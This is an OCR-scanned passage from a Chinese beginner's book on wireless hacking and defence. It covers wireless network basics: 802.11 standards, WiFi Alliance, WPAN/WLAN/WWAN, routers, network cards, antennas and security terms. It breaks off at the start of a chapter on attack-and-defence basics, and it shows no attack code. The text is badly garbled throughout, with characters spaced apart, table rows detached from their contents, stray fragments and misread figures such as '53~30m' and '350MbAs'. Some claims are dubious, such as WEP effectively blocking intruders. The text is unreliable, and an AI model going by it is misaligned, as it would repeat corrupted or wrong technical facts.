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第 1 章 ”无线 网 络 快速 入 门 


无 线 网 络 ， 特 别 是 无 线 局 域 网 给 我 们 的 生活 带 来 了 极 大 的 方便 ， 为 我 们 提供 了 无 处 不 
在 的 、 高 带宽 的 网 络 服务 ， 但 是 ， 由 于 无 线 信 道 特有 的 性 质 ， 使 得 无 线 网 络 连接 具有 不 稳 
定性 ， 且 容易 受到 黑客 的 攻击 ， 从 而 大 大 影响 了 服务 质量 ， 本 章 介绍 一 些 有 关 无 线 网 络 的 


基础 常识 。 


1.1 什么 是 无 线 网 络 


无 线 网 络 (Wireless network) 是 采用 
无 线 通信 技术 实现 的 网 络 ， 与 有 线 网 络 的 
用 途 十 分 类 似 ， 最 大 的 不 同 在 于 传输 媒介 
的 不 同 ， 一 般 来 说 ， 无 线 网 络 可 以 分 为 狭 
义 无 线 网 络 和 广义 无 线 网 络 两 种 。 


1.1.1 狭义 无 线 网 络 


狭义 无 线 网 络 就 是 我 们 常 说 的 无 线 局 
域 网 ， 是 基于 802.11b/g/n 标 准 的 WLAN 无 线 
局 域 网 ， 具 有 可 移动 性 、 安 装 简单 、 高 灵 
活性 和 高 扩展 能 力 等 特点 ， 作 为 对 传统 有 
线 网 络 的 延伸 ， 这 种 无 线 网 络 在 许多 特殊 
环境 中 得 到 了 广泛 地 应 用 ， 如 企业 内 部 、 
学 校内 部 、 家 庭 等 。 这 种 网 络 的 缺点 是 覆 
盖 范 围 小 ， 使 用 距离 在 53~30m 内 。 

随 着 无 线 数据 网 络 解决 方案 的 不 断 推 
出 ， 全 球 WiFi 设 备 迅猛 增长 ， 相 信 在 不 久 
的 将 来 ，“ 不 论 在 任何 时 间 、 任 何 地 点 都 
可 以 轻松 上 网 ”这 一 目标 就 会 被 实现 ， 下 
面 介绍 一 些 有 关 无 线 网 络 的 概念 


1. 无 线 网 络 的 起 源 


无 线 网 络 的 起 源 ， 可 以 追溯 到 第 二 
次 世界 大 战 期 间 ， 当 时 美军 采用 无 线 电信 
号 作 资料 的 传输 ， 他 们 研发 出 了 一 套 无 
线 电 传输 技术 ， 并 且 采 用 相当 高 强度 的 加 
密 技 术 。 当 时 美军 和 盟 军 都 广泛 使 用 这 项 
技术 。 


无 线 电 传输 技术 让 许多 学 者 得 到 了 灵 
感 ， 在 1971 年 时 ， 夏 威 夷 大 学 (University 
of Hawaii) 的 研究 员 创 造 了 第 一 个 基于 
封包 式 技术 的 无 线 电 通信 网 络 ， 被 称 作 
ALOHNET 网 络 ， 这 可 以 算是 相当 早期 的 无 
线 局 域 网 络 (WLAN) 了 。 最 早 的 WLAN 
包括 了 7 台 计 算 机 ， 它 们 采用 双向 星 型 拓扑 


《bi-directional star topology) ， 横 跨 四 座 me m 


夏威夷 的 岛屿 ， 中 心计 算 机 放置 在 瓦 胡 岛 跨 
(Oahu Island) 上 ， 从 那 时 开始 ， 无 线 网 络 外 3 
可 说 是 正式 诞生 了 。 下 图 为 一 个 星 型 拓扑 


结构 示意 图 。 
号 、 


2. IEEE 802.11 标 准 


IEEE 802.11 标 准 第 一 个 版 本 发 表 于 
1997 年 ， 其 中 定义 了 介质 访问 接 入 控制 
(MAC 层 ) 和 物理 层 。 物 理 层 定义 了 工作 
在 2.4GHz 的 ISM 频 段 上 的 两 种 无 线 调频 方 
式 和 一 种 红外 传输 的 方式 ， 总 数据 传输 速 


Bo 
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率 设计 为 2Mb/s。 两 个 设备 之 间 的 通信 可 以 以 自由 直接 (ad hoc) 的 方式 进行 ， 也 可 以 在 
基站 (Base Station，BS) 或 者 访问 点 (Access Point，AP) 的 协调 下 进行 。 
对 于 无 线 网 络 重要 发 展 标准 ， 用 户 有 必要 了 解 一 下 IEEE 802.11 标 准 的 发 展 过 程 ， 具 


体内 容 见 下 表 。 


表 802.11 标 准 的 发 展 史 


标 准 


说 明 


IEEE 802.11 


1997 年 ， 原 始 标准 (2Mb/s， 工 作 在 2.4GHz) 


IEEE 802.11a 


1999 年 ， 物 理 层 补充 〈54Mb/s， 工 作 在 5GHz) 


IEEE 802.11b 


1999 年 ， 物 理 层 补充 〔11Mb/s 工 作 在 2.4GHz) 


IEEE 802.11c 


符合 802.1D 的 媒体 接 入 控制 层 桥接 (MAC Layer Bridging) 


IEEE 802.11d | 根据 各 国 无 线 电 规定 做 的 调整 


IEEE 802.11e 
IEEE 802.11f 
IEEE 802.11g 
IEEE 802.11h 


IEEE 802.11i | 2004 年 ， 无 线 网 络 的 安全 方面 的 补充 


IEEE 802.11n | 350MbAs 甚 至 高 达 475Mb/s 


IEEE 802.11p 


目前 ， 无 线 网 络 及 设备 主要 使 用 的 是 
IEEE 802.llb/g/n 标 准 ， 尤 其 以 IEEE 802.llg 
最 为 普及 ， 不 过 IEEE 802.lln 正 在 以 飞快 的 
速度 赶 超 。 

除了 上 面 的 IEEE 标 准 ， 另 外 有 一 个 被 
称 为 IEEE 802.11b+ 的 技术 ， 通 过 PBCC 技 术 

(packet binary convolutional code) 在 IEEE 

802.11b 〈2.4GHz 频 段 ) 基础 上 提供 22Mb/s 
的 数据 传输 速率 。 但 这 事实 上 并 不 是 一 个 
IEEE 的 公开 标准 ， 而 是 一 项 产权 私有 的 
技术 。 


3. WiFi 联 盟 


WiFi 联 盟 成 立 于 1999 年 ， 是 一 家 全 球 
及 非 营利 性 的 行业 协会 ， 拥 有 几 百 家 企业 
会 员 ， 致 力 解决 符合 IEEE 802.11 标 准 的 产 
品 的 生产 和 设备 兼容 性 问题 ， 从 而 推动 无 
线 局 域 网 产业 的 发 展 ， 以 增强 移动 无 线 、 


对 服务 等 级 “Quality of Service.QoS) 的 支持 

基站 的 互 连 性 (IAPP Inter-Access Point Protocol) ，2006 年 2 月 被 IEEE 批 准 撤销 
2003 年 ， 物 理 层 补充 (54Mb/s， 工 作 在 2.4GHz) 

2004 年 ， 无 线 覆 盖 半 径 的 调整 ， 室 内 (indoor) 和 室外 (outdoor) 信道 (5GHz 频 段 ) 


2009 年 9 月 通过 正式 标准 ，WLAN 的 传输 速率 由 802.11a 及 802.11g 提 供 的 54Mb/s、108Mb/s， 提 高 至 


2010 年 ， 这 个 协定 主要 用 在 车 用 电子 的 无 线 通信 上 


便携 、 移 动 和 家 用 设备 的 用 户 体 验 为 目 
标 。 自 2003 年 3 月 WiFi 联 盟 开展 此 项 认证 以 
来 ， 已 经 有 超过 4000 多 种 产品 获得 了 WiFi 
GERTIFIED 指 定 认 证 标志 ， 有 力 地 推动 了 
WiFi 产 品 和 服务 在 消费 者 市 场 和 企业 市 场 
两 方面 的 全 面 开展 。 

WiFi 联 盟 认 证 标志 就 是 无 线 技 术 支 持 
的 象征 ， 被 广泛 应 用 在 智能 手机 、 平 板 计算 
机 、 笔 记 本 计算 机 和 各 种 便携 式 设 备 上 。 


4. 无 线 网 络 的 组 成 


无 线 网 络 由 以 下 几 个 部 分 组 成 。 

(1) 站 点 (Station) 。 网 络 最 基本 的 组 
成 部 分 ， 通 常 指 的 就 是 无 线 客 户 端 。 

(2) 基本 服务 单元 (Basic Service Set， 
BSS) 。 网 络 最 基本 的 服务 单元 。 最 简单 的 
服务 单元 可 以 只 由 两 个 无 线 客户 端 组 成 ， 
客户 端 可 以 动态 地 连接 (Associate) 到 基本 


服务 单元 中 。 

(3) 分 配 系统 (Distribution System， 
DS) 。 分 配 系统 用 于 连接 不 同 的 基本 服务 
单元 ， 分 配 系统 使 用 的 媒介 逻辑 上 和 基本 
服务 单元 使 用 的 媒介 是 截然 分 开 的 ， 尽 管 
它们 物理 上 可 能 会 是 同一 个 媒介 ， 例 如 同 
一 个 无 线 频道 。 

(4) 接 入 点 (Access Point，AP) 。 无 
线 接 入 点 既 有 普通 有 线 接 入 点 的 能 力 ， 又 
有 接 入 到 上 一 层 网 络 的 能 力 。 其 实 AP 和 无 
线路 由 器 是 有 区 别 的 ， 相 比 来 说 ， 无 线路 
由 器 的 功能 更 多 ， 不 过 在 基本 功能 方面 ， 
两 者 并 无 实质 性 的 区 别 ， 所 以 在 实际 应 用 
中 ， 都 会 将 无 线路 由 器 称 为 AP。 

(5) 扩展 服务 单元 (Extended Service 
Set，ESS) 。 由 分 配 系统 和 基本 服务 单元 
组 合 而 成 。 这 种 组 合 是 逻辑 上 的 ， 并 非 物 
理 上 的 ， 不 同 的 基本 服务 单元 有 可 能 在 地 
理 位 置 上 相差 其 远 。 分 配 系统 也 可 以 使 用 
各 种 各 样 的 技术 。 

(6) 关口 (Portal) 。 用 于 将 无 线 局 域 
网 和 有 线 局 域 网 或 其 他 网 络 联系 起 来 ， 是 
一 个 逻辑 成 分 。 

以 上 组 成 部 分 使 用 了 3 种 媒介 ， 站 点 
使 用 的 无 线 媒介 ， 分 配 系统 使 用 的 媒介 ， 
以 及 和 无 线 局 域 网 集成 一 起 的 其 他 局 域 网 
使 用 的 媒介 ， 物 理 上 它们 可 能 相互 重叠。 
IEEE 802.11 只 负责 在 站 点 使 用 的 无 线 媒 介 
上 寻找 地 址 ， 分 配 系统 和 其 他 局 域 网 的 寻 
址 不 属于 无 线 局 域 网 的 范围 。 


5. 无 线 网 络 的 运行 原理 


要 想 建 立 一 个 有 效 运行 的 无 线 网 络 ， 
首先 需要 至 少 一 个 AP， 如 无 线路 由 器 ， 然 
后 是 至 少 一 个 无 线 客 户 端 ， 即 装 有 无 线 网 
卡 的 便携 式 设备 ， 如 计算 机 、 手 机 、 平 板 
计算 机 等 。 硬 件 准备 完成 后 ，AP 每 100ms 
将 SSID 信 号 封包 广播 一 次 ， 无 线 客 户 端 
可 以 借 此 决定 是 否 要 和 这 一 个 SSID 的 AP 
连接 ， 使 用 者 还 可 以 设 定 要 连接 到 哪 一 个 
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SSID。 这 就 好 比 用 户 使 用 智能 手机 连接 周 
边 的 WiFi 一 样 ， 可 以 有 选择 地 进行 连接 。 
不 过 ，WiFi 系 统 总 是 对 客户 端 开 放 其 连接 
标准 ， 并 支持 漫游 ， 这 是 WiFi 的 优点 。 


1.1.2 ”广义 无 线 网 络 


广义 无 线 网 络 主要 包含 3 个 方面 ， 分 别 首 
是 WPAN、WLAN 和 WWAN， 下 面 分 别 进 
行 介绍 


1. WPAN 


WPAN (Wireless Personal Area Net- 
work， 无 线 个 人 局 域 网 通信 技术 ) 即 常 
说 的 无 线 个 人 局 域 网 。 无 线 个 人 局 域 网 
(WPAN) 是 一 种 采用 无 线 连接 的 个 人 局 域 
网 。 它 被 用 在 诸如 电话 、 计 算 机 、 附 属 设 
备 以 及 小 范围 (个 人 局 域 网 的 工作 范围 一 
般 是 在 10m 以 内 ) 内 的 数字 助理 设备 之 间 的 
通信 。 
无 线 个 人 局 域 网 (WPAN) 是 一 种 
与 无 线 广 域 网 C(WWAN) 、 无 线 局 域 网 
(WLAN) 并 列 但 覆盖 范围 相对 较 小 的 
无 线 网 络 。 在 网 络 构成 上 ，WPAN 位 于 整 
个 网 络 链 的 末端 ， 用 于 实现 同一 地 点 终端 
与 终端 间 的 连接 ， 如 连接 手机 和 蓝牙 耳机 
等 ，WPAN 设 备 具 有 价格 便宜 、 体 积 小 、 
易 操 作 和 功 耗 低 等 优点 。 
支持 无 线 个 人 局 域 网 的 技术 包括 : 蓝 
牙 、ZigBee、 超 频 波段 (UWB) 、IDA、 
HomeRF 等 ， 其 中 蓝牙 技术 在 无 线 个 人 局 域 
网 中 使 用 最 广泛 ， 下 面 就 来 介绍 几 种 主要 
的 技术 。 
e 蓝牙 (Bluetooth) : 蓝牙 是 一 种 短 
距离 无 线 通信 技术 ， 它 可 以 用 于 在 
较 小 的 范围 内 通过 无 线 连接 的 方式 
实现 固定 设备 或 移动 设备 之 间 的 网 
络 互联 ， 从 而 在 各 种 数字 设备 之 间 
实现 灵活 、 安 全 、 低 动 耗 、 低 成 本 
的 语音 和 数据 通信 。 

蓝牙 技术 的 一 般 有 效 通信 范围 为 10m， 
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强 的 可 以 达到 100m 左 右 ， 其 最 高 速率 可 达 
1Mb/s。 其 传输 使 用 的 功 耗 很 低 ， 广 泛 应 用 
于 无 线 设备 ， 如 平板 计算 机 、 手 机 、 智 能 电 
话 等 领域 。 下 图 为 一 个 智能 手机 的 蓝牙 设置 
界面 ， 在 其 中 可 以 开启 与 关闭 蓝牙 。 


中 国电 信息 日 书 吕 0 会 甘 洲 DD 15:48 
蓝牙 
开关 
5 ED 
开放 检测 
设备 名 称 HUAWEI MAIMANG 
接收 的 文件 
可 用 设备 
EB:E1:BC:3C:1F.30 
有 搜索 到 目标 设备 ? 查看 可 能 原因 
nat 加 


e IDA (红外 ) : IDA 是 红外 数据 组 
织 (Infrared Data Association) 的 简 
称 ， 目 前 广泛 采用 的 ITDA 红 外 连接 
技术 就 是 由 该 组 织 提出 的 ， 到 目前 
为 止 ， 全 球 采用 IrDA 技 术 的 设备 超 
过 了 5000 万 部 。 

IrDA 技 术 的 主要 特点 有 : 利用 红外 
传输 数据 ， 无 须 专门 申请 特定 频段 的 使 用 
执照 ， 设 备 体积 小 、 功 率 低 ; 由 于 采用 点 
到 点 的 连接 方式 ， 数 据 传输 受到 的 干扰 较 
小 ， 数 据 传输 速率 高 ， 可 达 1Gb/s。 但 存在 
一 定 的 技术 缺陷 ， 如 受 视 距 影响 其 传输 距 
离 短 、 要 求 通信 设备 的 位 置 固定 、 其 点 对 
点 的 传输 连接 无 法 灵活 地 组 成 网 络 等 。 


2. WLAN 


WLAN (Wireless Local Area Networks， 无 线 
局 域 网 ) 即 上 面 所 说 的 “狭义 无 线 网 络 ”， 
具体 请 参考 上 面 狭 义 无 线 网 络 的 内 容 。 


3. WWAN 


WWAN (Wireless Wide Area Network， 
无 线 广域网 通信 技术 ) 即 常 说 的 无 线 广 域 
网 。WWAN 技 术 是 使 得 笔记 本 计算 机 或 
者 其 他 的 设备 装置 在 蜂窝 网 络 覆盖 范围 内 
可 以 在 任何 地 方 连接 到 互联 网 。 目 前 全 球 
的 无 线 广域网 络 主要 采用 GSM 及 CDMA 技 
术 ， 其 他 还 有 3G 或 者 4G 等 技术 。 

简单 地 说 ，WWAN 指 的 就 是 通过 通 
信 设 备 和 通信 网 络 来 上 网 ， 不 管 是 以 前 的 
GSM、EDGE 和 CDMA， 还 是 现在 的 3G、 
4G 网 络 ， 只 要 用 计算 机 中 的 PC 卡 装 SIM 
卡 ， 或 者 把 手机 连 在 笔记 本 计算 机 上 当 作 
Modem 连 网 ， 都 叫 WWAN。 


1.2 认识 无 线路 由 器 


无 线路 由 器 是 应 用 于 用 户 上 网 、 带 有 
无 线 覆 盖 功 能 的 路 由 器 ， 它 和 有 线路 由 器 
的 作用 是 一 样 的 ， 唯 一 的 不 同 就 是 无 线路 由 
器 的 项 部 或 者 尾部 多 了 一 个 或 者 几 个 天 线 ， 
其 作用 就 是 提供 无 线 网 络 的 支持 。 除 此 以 
外 ， 其 他 无 论 是 外 观 ， 或 者 是 内 在 配置 页 面 
都 和 同 款 型 的 有 线路 由 器 一 模 一 样 。 

市 面 上 每 一 个 厂商 的 无 线 产品 都 有 
自己 的 特点 ， 下 图 为 美 版 思科 Linksys 
WRT1900AC 双 频 无 线路 由 器 ， 该 路 由 器 具 
有 4 个 天 线 ， 支 持 用 户 根据 需要 对 天 线 进行 
拆卸 和 换 装 ， 非 常 方便 。 另 外 ， 该 路 由 器 
支持 802.11b/g 协 议 ， 其 特点 是 使 用 多 个 无 
线 来 分 工 进 行 无 线 数据 的 接收 与 发 送 。 


目前 ， 市 场 占有 率 比 较 高 的 无 线路 由 
器 是 TP-LINK， 其 性 价 比 比较 高 。 下 图 为 
TP-LINK 千 兆 无 线路 由 器 ， 具 有 高 速 双核 、 
覆盖 更 远 、 家 长 控制 、 一 键 禁用 等 功能 。 
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为 方便 大 家 选 购 无 线路 由 器 ， 下 面 
把 目前 市 面 上 常见 的 无 线 设备 厂商 列举 出 
来 ， 包 括 厂商 名 称 、 官 方 网 站 以 及 个 人 建 
议 等 信息 见 下 表 。 


表 ”常见 无 线路 由 器 


厂商 名 称 官方 网 站 个 人 建议 
Linksys〔 领 势 ) wwwlinksys comyeny 价格 昂贵 ， 性 能 好 
D-LINK ( 友 讯 ) www.dlink.com.cn 性 价 比 不 错 ， 性 能 稳定 
TP-LINK〈 普 联 》 www.tp-link.com.cn 性 价 比较 高 ， 市 场 占 有 率 较 高 
Netgear( 网 件 》 价格 比较 贵 ， 性 能 不 错 
ASUS (华硕 ) 不 太 稳定 ， 价 格 适中 
Tenda (腾达 ) 性 价 比较 高 ， 性 能 稳定 


MERCURY (水 星 ) 


1.3 了解 无 线 网 卡 


对 于 初次 接触 无 线 网 络 的 用 户 来 说 ， 
无 线 网 卡 与 无 线 上 网 卡 是 有 些 迷 惑 的 ， 本 
节 就 来 介绍 什么 是 无 线 网 卡 ， 什 么 是 无 线 
上 网 卡 。 


1.3.1 无 线 网 卡 


无 线 网 卡 是 终端 无 线 网 络 设备 ， 是 不 
通过 有 线 连接 ， 采 用 无 线 信号 进行 数据 传 
输 的 终端 ， 有 时 也 被 称 为 WiFi 卡 ， 根 据 
接口 类 型 的 不 同 ， 主 要 有 PCMCIA 无 线 网 
卡 、PCI 无 线 网 卡 、Mini-PCI 无 线 网 卡 、 
USB 无 线 网 卡 、CF/SD 无 线 网 卡 几 类 。 

PCI 无 线 网 卡 : 主要 用 于 台式 计算 机 
中 ， 下 图 为 TP-LINK 出 品 的 PCI 无 线 网 卡 。 


Www.mercurycom.com.cn 


价格 较 高 ， 性 能 比较 稳定 


PCMCIA 无 线 网 卡 : 主要 用 于 笔记 本 计 
算 机 中 ， 下 图 为 Linksys 出 品 的 PCMCIA 无 
线 网 卡 。 


USB 无 线 网 卡 : 这 种 网 卡 不 管 是 台式 
机 用 户 还 是 笔记 本 用 户 ， 只 要 安装 了 驱动 
程序 ， 都 可 以 使 用 ， 下 图 为 LB-LINK 出 品 
的 USB 无 线 网 卡 。 


加 


Sram 
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Mini-PCI 无 线 网 卡 : Mini-PCI 为 内 置 型 
无 线 网 卡 ， 被 广泛 应 用 于 笔记 本 计算 机 之 
中 ， 其 优点 是 无 须 占用 PC 卡 或 USB 插 槽 ， 
并 且 免 去 了 随时 随身 携 一 张 PC 卡 或 USB 卡 
的 麻烦 。 

这 几 种 无 线 网 卡 在 价格 上 差距 不 大 ， 
在 性 能 和 功能 上 也 差不多 ， 用 户 可 根据 自 
己 的 需要 来 选择 。 在 距离 上 来 说 ， 无 线 网 
卡 是 依靠 接收 附近 无 线 网 络 信号 来 上 网 
的 ， 这 个 信号 源 不 能 离 得 太 远 ， 一 般 无 线 
网 卡 是 配合 无 线路 由 器 来 使 用 的 ， 使 用 距 
离 在 5~30m 内 。 


挤 澡 图 1.3.2 ”无线 上 网 卡 


无 线 上 网 卡 指 的 是 无 线 广域网 卡 ， 是 依 


靠 接收 无 线 宽带 运营 商 在 公共 场所 发 出 的 网 


络 信号 来 上 网 的 ， 这 个 信号 源 可 以 离 无 线 上 
网 的 计算 机 很 远 ， 如 联通 的 CDMA1X 上 网 
卡 、 移 动 的 GPRS 无 线 上 网 卡 、 电 信 的 EVDO 
无 线 上 网 卡 以 及 移动 /联通 的 3G 卡 、4G 卡 等 。 

无 线 上 网 卡 的 作用 于 功能 相当 于 有 线 的 


下 调制解调器 ， 也 就 是 我 们 俗称 的 “ 猫 ”， 它 


可 以 在 拥有 无 线 信号 覆盖 的 任何 地 方 ， 利 用 
无 线 上 网 卡 来 连接 到 互联 网 上 。 从 理论 上 
来 讲 ， 假 如 你 购买 了 移动 的 无 线 上 网 卡 ， 
那么 在 有 移动 基站 信号 覆盖 的 地 方 都 可 以 
进行 无 线 上 网 。 

一 般 来 讲 ， 无 线 上 网 卡 的 信号 强度 
要 比 有 线 网 卡 差 一 些 ， 但 也 能 满足 一 些 基 
础 的 网 络 应 用 ， 如 浏览 网 页 、 收 发 邮件 、 
网 络 聊天 等 。 不 过 ， 随 着 无 线 网 络 技术 发 
展 ， 尤 其 是 现在 的 EVDO、TD-CDMA 等 
3G/4G 技 术 的 出 现 ， 使 得 无 线 上 网 速度 大 大 
提升 。 下 图 为 中 国电 信 推 出 的 天 距 4G 无 线 


上 网 卡 。 
“< 


无 线 上 网 卡 一 般 只 针对 笔记 本 计算 机 
用 户 ， 常 用 的 接口 类 型 为 USB 接 口 ， 但 也 
有 PCMCIA 接 口 类 型 的 ， 下 图 为 中 兴 的 4G 
无 线 上 网 卡 ， 作 为 硬件 ， 一 般 在 用 户 购买 
无 线 上 网 套餐 的 时 候 ， 运 营 商 会 赠送 无 线 
上 网 卡 。 


1.4 了 解 天 线 


无 线 局 域 网 中 的 天 线 可 以 扩展 无 线 网 
络 的 覆盖 范围 ， 天 线 有 多 种 类 型 ， 根 据 方 
向 性 的 不 同 ， 天 线 分 为 全 向 和 定向 两 种 。 


1.4.1 全 向 天 线 


全 向 天 线 ， 即 在 水 平方 向 上 表现 为 
360” 均匀 辐射 ， 也 就 是 平常 所 说 的 无 方 
向 性 ， 在 垂直 方向 上 表现 为 有 一 定 宽度 的 
波束 ， 一 般 情况 下 波状 宽度 越 小 ， 增 益 越 
大 。 全 向 天 线 在 移动 通信 系统 中 一 般 应 用 
于 郊 县 大 区 制 的 站 型 ， 覆 盖 范 围 大 。 下 图 
为 连接 在 无 线 网 卡 上 的 全 向 天 线 。 


pe 


室内 全 向 天 线 适 合 于 无 线路 由 器 、AP 
这 样 的 需要 广泛 覆盖 信号 的 设备 上 ， 它 可 
以 将 信号 均匀 分 布 在 中 心 点 周围 360” 全 方 
位 区 域 ， 适 用 于 连接 点 距离 较 近 ， 分 布 角 
度 范围 大 ， 且 数量 较 多 的 情况 ， 如 无 线路 
由 器 上 的 天 线 ， 就 是 室内 全 向 天 线 。 下 图 
为 目前 常见 的 无 线路 由 器 形状 。 


那么 简单 地 讲 ， 全 向 天 线 就 相当 于 以 
天 线 为 圆心 ， 其 传输 距离 为 半径 ， 画 一 个 
圆 ， 这 个 圆 内 就 是 无 线 信 号 的 覆盖 范围 ， 
一 般 来 说 ， 在 实际 应 用 过 程 中 ， 半 径 多 为 
10 一 30m， 这 也 是 为 什么 能 在 街道 探测 到 那 
些 穿 出 墙壁 的 路 由 器 信号 的 原因 之 一 。 

如 果 将 全 向 天 线 安装 在 户外 ， 则 必须 
安装 在 大 楼 顶端 或 高 处 ， 并 且 位 于 信号 覆 
盖 区 的 中 央 位 置 ， 以 便于 其 他 指向 性 天 线 
装置 通信 ， 构 成 单 点 对 多 点 的 星 型 拓扑 。 


1.4.2 ”定向 天 线 


定向 天 线 ， 在 水 平方 向 上 表现 为 一 
定 角度 范围 辐射 ， 也 就 是 平常 所 说 的 有 方 
向 性 。 同 全 向 天 线 一 样 ， 波 辨 宽度 越 小 ， 
增益 越 大 。 定 向 天 线 在 通信 系统 中 一 般 应 
于 通信 距离 远 ， 覆 盖 范 围 小 ， 目 标 密度 
大 ， 频 率 利用 率 高 的 环境 。 

定向 天 线 有 各 种 不 同 的 款式 与 形状 ， 
如 Patch 天 线 、Panel 天 线 和 八木 天 线 等 ， 经 
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常用 于 无 线 区 域 网络 中 短 距离 的 桥接 ， 例 
如 ， 跨 马路 的 两 栋 大 楼 ， 或 者 空间 扩展 的 
厂房 、 仓 库 等 。 

用 户 也 可 以 按 以 下 方式 来 思考 全 向 天 
线 和 定向 天 线 之 间 的 关系 : 全 向 天 线 会 向 
四 面 八方 发 射 信 号 ， 前 后 左右 都 可 以 接收 
到 信号 ， 定 向 天 线 就 好 像 在 天 线 后 面罩 一 
个 碗 状 的 反射 面 ， 信 号 只 能 向 前 面 传递 ， 
射 向 后 面 的 信号 被 反射 面 挡住 并 反射 到 前 
方 ， 加 强 了 前 面 的 信号 强度 ， 可 以 想象 定 
向 天 线 的 主要 辐射 范围 像 一 个 倒立 的 不 太 
完整 的 圆锥 。 

此 外 ， 还 有 专门 用 于 长 距离 通信 的 高 
方向 性 天 线 ， 有 极 窗 的 波束 宽度 和 很 高 的 
增益 值 ， 也 被 称 为 高 增益 指向 性 天 线 ， 如 
碟 形 天 线 和 格 状 天 线 ， 通 常用 于 点 对 点 的 
通信 和 连接， 传输 距离 高 达 40km。 因 为 波束 
非常 窗 ， 因 此 天 线 彼 此 之 间 必 须要 很 精准 
地 瞄准 ， 而 且 天 线 之 间 的 直 视 必须 没有 任 
何 阻碍 物 。 

通过 上 文 能 够 形象 地 认识 到 什么 是 全 
向 天 线 ， 什 么 是 定向 天 线 ， 那 么 在 实际 应 
用 时 该 注意 些 什么 呢 ? 如 果 需 要 满足 多 个 站 
点 ， 并 且 这 些 站 点 是 分 布 在 AP 的 不 同方 向 
时 ， 需 要 采用 全 向 天 线 ;， 如 果 集 中 在 一 个 
方向 ， 建 议 采 用 定向 天 线 ， 另 外 还 要 考虑 
天 线 的 接头 形式 是 否 和 AP 匹配 、 天 线 的 增 
益 大 小 等 是 否 符合 自己 的 需求 。 

对 于 室外 天 线 ， 在 安装 的 过 程 中 ， 天 
线 与 无 线 AP 之 间 需 要 增加 防 雷 设备 ， 定 向 
天 线 要 注意 天 线 的 正面 朝向 远 端 站 点 的 方 


向 ; 天 线 应 该 安装 在 尽 可 能 高 的 位 置 ， 天 器 测 中 


线 和 站 点 之 间 尽 可 能 满足 视 距 ， 即 肉眼 可 沽 他 


见 ， 中 间 避 开 障碍 。 


熟悉 无 线 网 络 的 术语 


下 面 是 无 线 网 络 安 全 中 
本 术语 ， 了 解 这 些 术语 ， 可 以 帮助 用 户 更 
好 地 维护 无 线 网 络 安全 。 
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常会 涉及 的 基 中 ~ 


黑客 攻防 与 无 线 安 全 从 新 手 到 高 手 ( 超 值 版 ) 


(1) WiFi。WiFi 是 一 种 允许 电子 设备 
连接 到 一 个 无 线 局 域 网 (WLAN) 的 技 
术 ， 通 常 使 用 2.4G UHF 或 5G SHF ISM 射 
频频 段 。 连 接 到 无 线 局 域 网 通常 是 有 密码 
保护 的 ;但 也 可 是 开放 的 ， 这 样 就 允许 在 
WLAN 范围 内 的 任何 设备 可 以 连接 上 。 

(2) SSID。SSID (Service Set Identi- 
fier， 服 务 集 标识 符 ) 技术 可 以 将 一 个 无 
线 局 域 网 分 为 几 个 需要 不 同 身份 验证 的 子 
网 络 ， 每 一 个 子 网 络 都 需要 独立 的 身份 验 
证 ， 只 有 通过 身份 验证 的 用 户 才 可 以 进入 
相应 的 子 网 络 ， 防 止 未 被 授权 的 用 户 进入 
本 网 络 。SSID 可 以 是 任何 字符 ， 最 大 长 度 
为 32 个 字符 。 

(3) WAP。WAP (Wireless Application 
Protocol， 无 线 应 用 协议 ) 是 一 项 全 球 性 的 
网 络 通信 协议 。 它 使 移动 mtermet 有 了 一 个 
通行 的 标准 ， 其 目标 是 将 Internet 的 丰富 信 
息 及 先进 的 业务 引入 到 移动 电话 等 无 线 终 
端 之 中 。 

(4) AP。Wireless Access Point， 无线 
访问 接 入 点 。AP 就 是 传统 有 线 网 络 中 的 
Hub， 也 是 组 建 小 型 无 线 局 域 网 时 最 常用 的 
设备 。AP 相当 于 一 个 连接 有 线 网 和 无 线 网 
的 桥梁 ， 其 主要 作用 是 将 各 个 无 线 网 络 客 
户 端 连接 到 一 起 ， 然 后 将 无 线 网 络 接 入 以 
太 网 。 


(5) WEP. WEP (Wired Equivalent Pri- 
vacy) 是 目前 比较 常用 的 无 线 网 络 认 证 机 
制 之 一 ， 它 是 802.11 定义 下 的 一 种 加 密 方 
式 ， 简 单 地 说 ， 就 是 先 在 无 线 AP 中 设 定 一 
组 密码 ， 使 用 者 要 连接 上 这 个 无 线 AP 时 ， 
必须 输入 设置 的 密码 才能 连接 上 ， 可 以 有 
效 防 止 非法 用 户 窃听 或 侵入 无 线 网 络 。 

(6) WPA。WPA (WiFi Protected Ac- 
cess) 是 一 种 基于 标准 的 可 互 操作 的 WLAN 
安全 性 增强 解决 方案 ， 可 大 大 增强 现 有 以 
及 未 来 无 线 局 域 网 系统 的 数据 保护 和 访问 
控制 水 平 。 分 为 个 人 WPA-Personal 与 企业 
WPA-Enterprise 两 种 。 

(7) EAP。EAP (Extensible Authentica- 
tion Protocol， 扩 展 认证 协议 ) 是 一 种 用 于 
验证 网 络 设备 身份 的 鉴 权 机 制 。 

(8) GPS。 (Global Positioning System 
全 球 定位 系统 ) 又 称 全 球 卫星 定位 系统 ， 是 
一 个 中 距离 圆 形 轨道 卫星 导航 系统 。 它 可 
以 为 地 球 表面 绝 大 部 分 地 区 (98%) 提供 准 
确 的 定位 、 测 速 和 高 精度 的 时 间 标 准 。 


1.6 “小 试 身手 


练习 1: 认识 无 线路 由 器 。 
练习 2: 查看 网 卡 的 实体 结构 。 
练习 3: 查看 天 线 的 实体 结构 。 


第 2 音 ”无 线 网 络 攻防 必 备 知识 


作为 无 线 网 络 中 的 计算 机 或 终端 设备 用 户 ， 要 想 使 自己 的 设备 不 受 或 少 受 黑客 的 攻 
击 ， 就 必须 了 解 一 些 黑客 常用 的 入 侵 手 段 以 及 学 习 一 些 无 线 网 络 安全 方面 的 基础 知识 ， 本 
章 介绍 有 关 这 方面 的 内 容 ， 如 无 线 网 络 的 协议 标准 、802.11n 协 议 的 关键 技术 、IP 地 址 、 


MAC 地 址 、 端 口 以 及 黑客 常用 的 DOS 命 令 等 。 


无 线 网 络 协议 标准 


无 线 局 域 网 络 (Wireless Local Area Net- 
works，WLAN) 利用 射频 (Radio Frequen- 
cy，RF) 或 是 红外 线 (InfraRed，IR) 的 技 
术 ， 以 无 线 的 方式 连接 两 部 或 多 部 需要 交换 
数据 的 计算 机 设备 ， 利 用 无 线 的 高 移动 性 来 
应 用 于 各 个 需要 的 应 用 领域 之 中 。 

无 线 网 络 的 通信 协议 标准 为 IEEE 802.11 
协议 族 ， 主 要 包括 IEEE 802.11、IEEE 
802.11b、 IEEE 802.11a、 IEEE 802.11g、 
